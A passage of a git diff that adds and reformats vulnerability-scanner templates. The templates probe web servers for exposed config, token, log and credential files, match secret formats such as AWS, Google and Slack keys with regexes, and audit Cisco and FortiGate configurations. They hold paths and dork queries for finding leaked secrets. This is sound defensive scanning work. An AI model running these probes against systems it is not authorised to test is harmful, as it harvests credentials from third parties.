+      - "{{BaseURL}}/config/security.yml"
+      - "{{BaseURL}}/app/config/security.yml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'security:'
+          - 'providers:'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/token-info-json.yaml b/exposures/files/token-info-json.yaml
new file mode 100644
index 0000000000..e592720df4
--- /dev/null
+++ b/exposures/files/token-info-json.yaml
@@ -0,0 +1,29 @@
+id: token-info-json
+
+info:
+  name: Token Info Json File
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "token_info.json"
+  tags: exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/constant-contact-forms/vendor/constantcontact/constantcontact/test/Json/Auth/token_info.json"
+      - "{{BaseURL}}/wp-content/plugins/constant-contact-api-old/vendor/constantcontact/constantcontact/test/Json/Auth/token_info.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"client_id":'
+          - '"user_name":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/token-json.yaml b/exposures/files/token-json.yaml
new file mode 100644
index 0000000000..ac07d22f48
--- /dev/null
+++ b/exposures/files/token-json.yaml
@@ -0,0 +1,29 @@
+id: token-json
+
+info:
+  name: Token Json File Disclosure
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "token.json"
+  tags: exposure,cloud,google,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/token.json"
+      - "{{BaseURL}}/search/token.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"access_token":'
+          - '"token_type":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/uwsgi-ini.yaml b/exposures/files/uwsgi-ini.yaml
new file mode 100644
index 0000000000..c2a1233184
--- /dev/null
+++ b/exposures/files/uwsgi-ini.yaml
@@ -0,0 +1,26 @@
+id: uwsgi-ini
+
+info:
+  name: uwsgi.ini File Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"uwsgi.ini"
+  tags: exposure,uwsgi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/uwsgi.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '[uwsgi]'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/vagrantfile-exposure.yaml b/exposures/files/vagrantfile-exposure.yaml
new file mode 100644
index 0000000000..d6a643fc6a
--- /dev/null
+++ b/exposures/files/vagrantfile-exposure.yaml
@@ -0,0 +1,34 @@
+id: vagrantfile-exposure
+
+info:
+  name: Vagrantfile Exposure
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"Vagrantfile"
+  tags: config,exposure,vagrant,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Vagrantfile"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "./vagrant/config/vagrant-local.yml"
+          - "./vagrant/config/vagrant-local.example.yml"
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "text/html"
+        negative: true
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/webpack-mix-js.yaml b/exposures/files/webpack-mix-js.yaml
new file mode 100644
index 0000000000..dacf9a00c1
--- /dev/null
+++ b/exposures/files/webpack-mix-js.yaml
@@ -0,0 +1,27 @@
+id: webpack-mix-js
+
+info:
+  name: Webpack Mix File Disclosure
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"webpack.mix.js"
+  tags: config,exposure,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webpack.mix.js"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Mix Asset Management"
+          - "const mix"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/wget-hsts-list-exposure.yaml b/exposures/files/wget-hsts-list-exposure.yaml
new file mode 100644
index 0000000000..46266eb9c9
--- /dev/null
+++ b/exposures/files/wget-hsts-list-exposure.yaml
@@ -0,0 +1,25 @@
+id: wget-hsts-list-exposure
+
+info:
+  name: WGET HSTS List Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:".wget-hsts"
+  tags: devops,exposure,wget
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.wget-hsts"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'HSTS 1.0 Known Hosts database for GNU Wget'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/wp-cli-exposure.yaml b/exposures/files/wp-cli-exposure.yaml
new file mode 100644
index 0000000000..08b73b1dd7
--- /dev/null
+++ b/exposures/files/wp-cli-exposure.yaml
@@ -0,0 +1,27 @@
+id: wp-cli-exposure
+
+info:
+  name: WP-CLI Yaml File Exposure
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"wp-cli.yml"
+  tags: config,exposure,wp-cli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-cli.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "apache_modules:"
+          - "mod_rewrite"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/ws-ftp-ini.yaml b/exposures/files/ws-ftp-ini.yaml
new file mode 100644
index 0000000000..f956a6a255
--- /dev/null
+++ b/exposures/files/ws-ftp-ini.yaml
@@ -0,0 +1,31 @@
+id: ws-ftp-ini
+
+info:
+  name: WS FTP File Disclosure
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    google-query: intitle:"Index of" ws_ftp.ini
+  tags: exposure,ftp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ws_ftp.ini'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'HOST='
+          - 'UID='
+          - 'DIR='
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/xampp-environment-variables.yaml b/exposures/files/xampp-environment-variables.yaml
new file mode 100644
index 0000000000..92423fbcb0
--- /dev/null
+++ b/exposures/files/xampp-environment-variables.yaml
@@ -0,0 +1,30 @@
+id: xampp-environment-variables
+
+info:
+  name: XAMPP Environment Variables Exposure
+  author: melbadry9,DhiyaneshDK
+  severity: low
+  tags: exposure,xampp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/printenv.pl"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<TITLE>Environment Variables</TITLE>"
+          - "Environment Variables:"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml
index 329e54433e..1ff6ed782a 100644
--- a/exposures/logs/error-logs.yaml
+++ b/exposures/logs/error-logs.yaml
@@ -2,40 +2,41 @@ id: error-logs
 
 info:
   name: common error log files
-  author: geeknik,daffainfo
+  author: geeknik,daffainfo,ELSFA7110
   severity: low
   tags: logs,exposure,error
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/routes/error_log"
-      - "{{BaseURL}}/config/error_log"
-      - "{{BaseURL}}/error_log"
-      - "{{BaseURL}}/errors_log"
-      - "{{BaseURL}}/logs/error.log"
-      - "{{BaseURL}}/logs/errors.log"
-      - "{{BaseURL}}/log/error.log"
-      - "{{BaseURL}}/log/errors.log"
-      - "{{BaseURL}}/errors/errors.log"
-      - "{{BaseURL}}/error/error.log"
-      - "{{BaseURL}}/errors.log"
-      - "{{BaseURL}}/error.log"
-      - "{{BaseURL}}/error.txt"
-      - "{{BaseURL}}/errors.txt"
-      - "{{BaseURL}}/admin/logs/error.log"
-      - "{{BaseURL}}/admin/logs/errors.log"
-      - "{{BaseURL}}/admin/log/error.log"
+      - "{{BaseURL}}/MyErrors.log"
       - "{{BaseURL}}/admin/error.log"
       - "{{BaseURL}}/admin/errors.log"
-      - "{{BaseURL}}/{{Hostname}}/error.log"
-      - "{{BaseURL}}/{{Hostname}}/errors.log"
-      - "{{BaseURL}}/MyErrors.log"
-      - "{{BaseURL}}/log.txt"
-      - "{{BaseURL}}/logs.txt"
-      - "{{BaseURL}}/log.log"
+      - "{{BaseURL}}/admin/log/error.log"
+      - "{{BaseURL}}/admin/logs/error.log"
+      - "{{BaseURL}}/admin/logs/errors.log"
       - "{{BaseURL}}/application/logs/application.log"
       - "{{BaseURL}}/application/logs/default.log"
+      - "{{BaseURL}}/config/error_log"
+      - "{{BaseURL}}/error.log"
+      - "{{BaseURL}}/error.txt"
+      - "{{BaseURL}}/error/error.log"
+      - "{{BaseURL}}/error_log"
+      - "{{BaseURL}}/error_log.txt"
+      - "{{BaseURL}}/errors.log"
+      - "{{BaseURL}}/errors.txt"
+      - "{{BaseURL}}/errors/errors.log"
+      - "{{BaseURL}}/errors_log"
+      - "{{BaseURL}}/log.log"
+      - "{{BaseURL}}/log.txt"
+      - "{{BaseURL}}/log/error.log"
+      - "{{BaseURL}}/log/errors.log"
+      - "{{BaseURL}}/logs.txt"
+      - "{{BaseURL}}/logs/error.log"
+      - "{{BaseURL}}/logs/errors.log"
+      - "{{BaseURL}}/routes/error_log"
+      - "{{BaseURL}}/{{Hostname}}/error.log"
+      - "{{BaseURL}}/{{Hostname}}/errors.log"
 
     matchers-condition: and
     matchers:
diff --git a/exposures/logs/event-debug-server-status.yaml b/exposures/logs/event-debug-server-status.yaml
new file mode 100644
index 0000000000..6a5bddbc20
--- /dev/null
+++ b/exposures/logs/event-debug-server-status.yaml
@@ -0,0 +1,33 @@
+id: event-debug-server-status
+
+info:
+  name: Event Debug Server Status
+  author: pussycat0x
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: title:"Event Debug Server"
+  tags: event,exposure,debug
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<h1>Event Debug Server Status</h1>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'Version: <tt>([0-9.]+)'
diff --git a/exposures/logs/fastcgi-echo.yaml b/exposures/logs/fastcgi-echo.yaml
new file mode 100644
index 0000000000..157728e6a3
--- /dev/null
+++ b/exposures/logs/fastcgi-echo.yaml
@@ -0,0 +1,36 @@
+id: fastcgi-echo
+
+info:
+  name: Fastcgi Echo Endpoint Exposure
+  author: powerexploit
+  severity: info
+  description: |
+    FastCGI module delivered with the Apache httpd server that is incorporated into the Oracle Application Server.FastCGI echo programs (echo and echo2) should be always removed or disabled in all Oracle Application Servers implementations as they can provide information at an attacker
+  reference:
+    - https://www.exploit-db.com/ghdb/183
+    - https://www.integrigy.com/oracle-application-server-fastcgi-echo-vulnerability-reports
+  metadata:
+    verified: true
+    google-query: inurl:fcgi-bin/echo
+  tags: exposure,logs,oracle,fastcgi,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fcgi-bin/echo"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>FastCGI echo</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/logs/git-logs-exposure.yaml b/exposures/logs/git-logs-exposure.yaml
new file mode 100644
index 0000000000..12f4df668c
--- /dev/null
+++ b/exposures/logs/git-logs-exposure.yaml
@@ -0,0 +1,33 @@
+id: git-logs-exposure
+
+info:
+  name: Git Logs Disclosure
+  author: NullFuzz
+  severity: Info
+  description: Searches Git Logs files and passed URLs.
+  tags: logs,git,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.git/logs/HEAD"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body), '<html')"
+          - "!contains(tolower(body), '<body')"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: regex
+        regex:
+          - '^([a-z0-9]+) '
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/logs/lucee-stack-trace.yaml b/exposures/logs/lucee-stack-trace.yaml
index abea97d880..2f10a37a4a 100644
--- a/exposures/logs/lucee-stack-trace.yaml
+++ b/exposures/logs/lucee-stack-trace.yaml
@@ -4,8 +4,8 @@ info:
   name: Lucee Stack Trace Error
   author: dhiyaneshDK
   severity: low
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Lucee%22
+  metadata:
+    shodan-query: http.title:"Lucee"
   tags: lucee,exposure
 
 requests:
diff --git a/exposures/logs/redis-exception-error.yaml b/exposures/logs/redis-exception-error.yaml
new file mode 100644
index 0000000000..37ebcf71ef
--- /dev/null
+++ b/exposures/logs/redis-exception-error.yaml
@@ -0,0 +1,33 @@
+id: redis-exception-error
+
+info:
+  name: Redis Exception Connection Error Page
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/pcb.5563308760399619/5563307330399762/
+  metadata:
+    verified: true
+    shodan-query: html:"redis.exceptions.ConnectionError"
+  tags: exposure,redis,logs
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'redis.exceptions.ConnectionError'
+
+      - type: word
+        part: header
+        words:
+          - text/plain
+
+      - type: status
+        status:
+          - 500
diff --git a/exposures/logs/struts-problem-report.yaml b/exposures/logs/struts-problem-report.yaml
index 09515b9c8c..02ebea4e0f 100644
--- a/exposures/logs/struts-problem-report.yaml
+++ b/exposures/logs/struts-problem-report.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/4278
-  tags: exposure,apache,struts,debug
+  tags: struts,debug,edb,exposure,apache
 
 requests:
   - method: GET
diff --git a/exposures/logs/webalizer-xtended-stats.yaml b/exposures/logs/webalizer-xtended-stats.yaml
new file mode 100644
index 0000000000..29f6527937
--- /dev/null
+++ b/exposures/logs/webalizer-xtended-stats.yaml
@@ -0,0 +1,31 @@
+id: webalizer-xtended-stats
+
+info:
+  name: Webalizer Xtended Statistics Exposed
+  author: ritikchaddha
+  severity: low
+  reference:
+    - https://www.patrickfrei.ch/webalizer/
+  metadata:
+    verified: true
+    google-query: inurl:"/usage/error_202109.html"
+  tags: exposure,stats,webalizer
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/usage/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<TITLE>Webalizer</TITLE>'
+          - 'SRC=menu.html'
+        condition: and
+        case-insensitive: true
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/logs/zm-system-log-detect.yaml b/exposures/logs/zm-system-log-detect.yaml
index 54c7215c7b..dfcee208e5 100644
--- a/exposures/logs/zm-system-log-detect.yaml
+++ b/exposures/logs/zm-system-log-detect.yaml
@@ -1,25 +1,25 @@
-id: zm-system-log-detect
+id: zm-system-log-detect
 
-info:
-  name: zm-system-log-detect
-  author: pussycat0x
-  severity: low
-  reference: https://www.exploit-db.com/ghdb/6926
-  tags: logs,zm,exposure
+info:
+  name: zm-system-log-detect
+  author: pussycat0x
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/6926
+  tags: logs,zm,exposure
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?view=log"
-      - "{{BaseURL}}/zm/?view=log"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>ZM - System Log</title>"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?view=log"
+      - "{{BaseURL}}/zm/?view=log"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>ZM - System Log</title>"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/exposures/tokens/amazon/aws-access-key-value.yaml b/exposures/tokens/amazon/aws-access-key-value.yaml
index b1f6dd5190..b942b0a23a 100644
--- a/exposures/tokens/amazon/aws-access-key-value.yaml
+++ b/exposures/tokens/amazon/aws-access-key-value.yaml
@@ -1,18 +1,18 @@
-id: aws-access-key-value
+id: aws-access-key-value
 
-info:
-  name: AWS Access Key ID Value
-  author: Swissky
-  severity: info
-  tags: exposure,token,aws,amazon
+info:
+  name: AWS Access Key ID Value
+  author: Swissky
+  severity: info
+  tags: exposure,token,aws,amazon
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
diff --git a/exposures/tokens/azure/azure-apim-secretkey.yaml b/exposures/tokens/azure/azure-apim-secretkey.yaml
new file mode 100644
index 0000000000..09d0754658
--- /dev/null
+++ b/exposures/tokens/azure/azure-apim-secretkey.yaml
@@ -0,0 +1,27 @@
+id: azure-apim-secretkey
+
+info:
+  name: Azure - APIM Secret Key
+  author: israel comazzetto dos reis
+  severity: info
+  description: Azure APIM Secret Key
+  metadata:
+    verified: true
+    shodan-query: html:"Ocp-Apim-Subscription-Key"
+  tags: azure,apim,microsoft,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"Ocp-Apim-Subscription-Key":'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/tokens/google/google-api-key.yaml b/exposures/tokens/google/google-api-key.yaml
index 33e2265de0..1798c569c3 100644
--- a/exposures/tokens/google/google-api-key.yaml
+++ b/exposures/tokens/google/google-api-key.yaml
@@ -1,19 +1,19 @@
-id: google-api-key
+id: google-api-key
 
-info:
-  name: Google API Key
-  author: Swissky
-  severity: info
-  tags: exposure,token,google
+info:
+  name: Google API Key
+  author: Swissky
+  severity: info
+  tags: exposure,token,google
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-      - "{{BaseURL}}/hopfully404"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "AIza[0-9A-Za-z\\-_]{35}"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/hopfully404"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "AIza[0-9A-Za-z\\-_]{35}"
diff --git a/exposures/tokens/mailchimp/mailchimp-api-key.yaml b/exposures/tokens/mailchimp/mailchimp-api-key.yaml
index c55e7bcbac..3ca9f1ae24 100644
--- a/exposures/tokens/mailchimp/mailchimp-api-key.yaml
+++ b/exposures/tokens/mailchimp/mailchimp-api-key.yaml
@@ -1,18 +1,18 @@
-id: mailchimp-access-key-value
+id: mailchimp-access-key-value
 
-info:
-  name: Mailchimp API Value
-  author: puzzlepeaches
-  severity: info
-  tags: exposure,token,mailchimp
+info:
+  name: Mailchimp API Value
+  author: puzzlepeaches
+  severity: info
+  tags: exposure,token,mailchimp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "[0-9a-f]{32}-us[0-9]{1,2}"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "[0-9a-f]{32}-us[0-9]{1,2}"
diff --git a/technologies/vmware/vmware-horizon.yaml b/exposures/tokens/nextjs/cipher-secret-key.yaml
similarity index 57%
rename from technologies/vmware/vmware-horizon.yaml
rename to exposures/tokens/nextjs/cipher-secret-key.yaml
index 0534f296d9..d5f181b5a1 100644
--- a/technologies/vmware/vmware-horizon.yaml
+++ b/exposures/tokens/nextjs/cipher-secret-key.yaml
@@ -1,24 +1,23 @@
-id: vmware-horizon
+id: cipher-secret-key
 
 info:
-  name: VMware Horizon
-  author: pdteam
+  name: Cipher Secret Key Exposure
+  author: israel comazzetto dos reis
   severity: info
-  tags: vmware,horizon
+  tags: exposure
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}"
 
-    redirects: true
-    max-redirects: 2
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - "cipherSecretKey:"
+
       - type: status
         status:
           - 200
-
-      - type: word
-        words:
-          - 'VMware Horizon'
diff --git a/exposures/tokens/slack/slack-bot-token.yaml b/exposures/tokens/slack/slack-bot-token.yaml
index 0330386356..e520d806c8 100644
--- a/exposures/tokens/slack/slack-bot-token.yaml
+++ b/exposures/tokens/slack/slack-bot-token.yaml
@@ -1,18 +1,18 @@
-id: slack-bot-token
+id: slack-bot-token
 
-info:
-  name: Slack access token
-  author: nadino
-  severity: info
-  tags: exposure,token,slack
+info:
+  name: Slack access token
+  author: nadino
+  severity: info
+  tags: exposure,token,slack
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
           - "xoxb-[0-9A-Za-z\\-]{51}"
\ No newline at end of file
diff --git a/file/audit/cisco/configure-aaa-service.yaml b/file/audit/cisco/configure-aaa-service.yaml
new file mode 100644
index 0000000000..c7133a4859
--- /dev/null
+++ b/file/audit/cisco/configure-aaa-service.yaml
@@ -0,0 +1,26 @@
+id: configure-aaa-service
+
+info:
+  name: Configure AAA service
+  author: pussycat0x
+  severity: info
+  description: |
+      Authentication, authorization and accounting (AAA) services provide an authoritative source for managing and monitoring access for devices.
+  reference:
+    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "aaa new-model"
+        negative: true
+
+      - type: word
+        words:
+          - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/configure-service-timestamps-debug.yaml b/file/audit/cisco/configure-service-timestamps-debug.yaml
new file mode 100644
index 0000000000..7fa403065f
--- /dev/null
+++ b/file/audit/cisco/configure-service-timestamps-debug.yaml
@@ -0,0 +1,26 @@
+id: configure-service-timestamps-debug
+
+info:
+  name: Configure Service Timestamps for Debug
+  author: pussycat0x
+  severity: info
+  description: |
+      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
+  reference:
+    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "service timestamps debug datetime msec show-timezone localtime"
+        negative: true
+
+      - type: word
+        words:
+          - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml
new file mode 100644
index 0000000000..227fb91dc4
--- /dev/null
+++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml
@@ -0,0 +1,26 @@
+id: configure-service-log-messages
+
+info:
+  name: Configure Service Timestamps Log Messages
+  author: pussycat0x
+  severity: info
+  description: |
+      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
+  reference:
+    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "service timestamps log datetime msec show-timezone localtime"
+        negative: true
+
+      - type: word
+        words:
+          - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/disable-ip-source-route.yaml b/file/audit/cisco/disable-ip-source-route.yaml
new file mode 100644
index 0000000000..e41bba987f
--- /dev/null
+++ b/file/audit/cisco/disable-ip-source-route.yaml
@@ -0,0 +1,26 @@
+id: disable-ip-source-route
+
+info:
+  name: Disable IP source-route
+  author: pussycat0x
+  severity: info
+  description: |
+      Organizations should plan and implement network policies to ensure unnecessary services are explicitly disabled. The 'ip source-route' feature has been used in several attacks and should be disabled.
+  reference:
+    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "no ip source-route"
+        negative: true
+
+      - type: word
+        words:
+          - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/disable-pad-service.yaml b/file/audit/cisco/disable-pad-service.yaml
new file mode 100644
index 0000000000..898ed8d43e
--- /dev/null
+++ b/file/audit/cisco/disable-pad-service.yaml
@@ -0,0 +1,26 @@
+id: disable-pad-service
+
+info:
+  name: Disable PAD service
+  author: pussycat0x
+  severity: info
+  description: |
+      To reduce the risk of unauthorized access, organizations should implement a security policy restricting unnecessary services such as the 'PAD' service.
+  reference:
+    - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "no service pad"
+        negative: true
+
+      - type: word
+        words:
+          - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/enable-secret-for-password-user-and-.yaml b/file/audit/cisco/enable-secret-for-password-user-and-.yaml
new file mode 100644
index 0000000000..a309f0164b
--- /dev/null
+++ b/file/audit/cisco/enable-secret-for-password-user-and-.yaml
@@ -0,0 +1,26 @@
+id: enable-secret-for-user-and-password
+
+info:
+  name: Enable and User Password with Secret
+  author: pussycat0x
+  severity: info
+  description: |
+      To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
+  reference:
+    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
+  tags: cisco,config-audit,cisco-switch,router
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "enable secret"
+        negative: true
+
+      - type: word
+        words:
+          - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml
new file mode 100644
index 0000000000..95f0ed0c66
--- /dev/null
+++ b/file/audit/cisco/logging-enable.yaml
@@ -0,0 +1,26 @@
+id: logging-enable
+
+info:
+  name: Logging enable
+  author: pussycat0x
+  severity: info
+  description: |
+      Enabling the Cisco IOS 'logging enable' command enforces the monitoring of technology risks for the organizations' network devices.
+  reference:
+    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf
+  tags: cisco,config-audit,cisco-switch
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "logging enable"
+        negative: true
+
+      - type: word
+        words:
+          - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/cisco/set-and-secure-passwords.yaml b/file/audit/cisco/set-and-secure-passwords.yaml
new file mode 100644
index 0000000000..275d70d9dd
--- /dev/null
+++ b/file/audit/cisco/set-and-secure-passwords.yaml
@@ -0,0 +1,26 @@
+id: set-and-secure-passwords
+
+info:
+  name: Set and secure passwords
+  author: pussycat0x
+  severity: info
+  description: |
+      To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command.
+  reference:
+    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514
+  tags: cisco,config-audit,cisco-switch
+
+file:
+  - extensions:
+      - conf
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "service password-encryption"
+        negative: true
+
+      - type: word
+        words:
+          - "configure terminal"
\ No newline at end of file
diff --git a/file/audit/fortigate/auto-usb-install.yaml b/file/audit/fortigate/auto-usb-install.yaml
index 01c105ea73..0f971fe501 100644
--- a/file/audit/fortigate/auto-usb-install.yaml
+++ b/file/audit/fortigate/auto-usb-install.yaml
@@ -1,28 +1,28 @@
-id: auto-usb-install
-
-info:
-  name: Auto USB Installation Enabled
-  author: pussycat0x
-  severity: info
-  description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
-  reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
-  tags: fortigate,config,audit,firewall
-
-file:
-  - extensions:
-      - conf
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "set auto-install-config disable"
-          - "set auto-install-image disable"
-        negative: true
-
-      - type: word
-        words:
-          - "config system"
-          - "config router"
-          - "config firewall"
-        condition: or
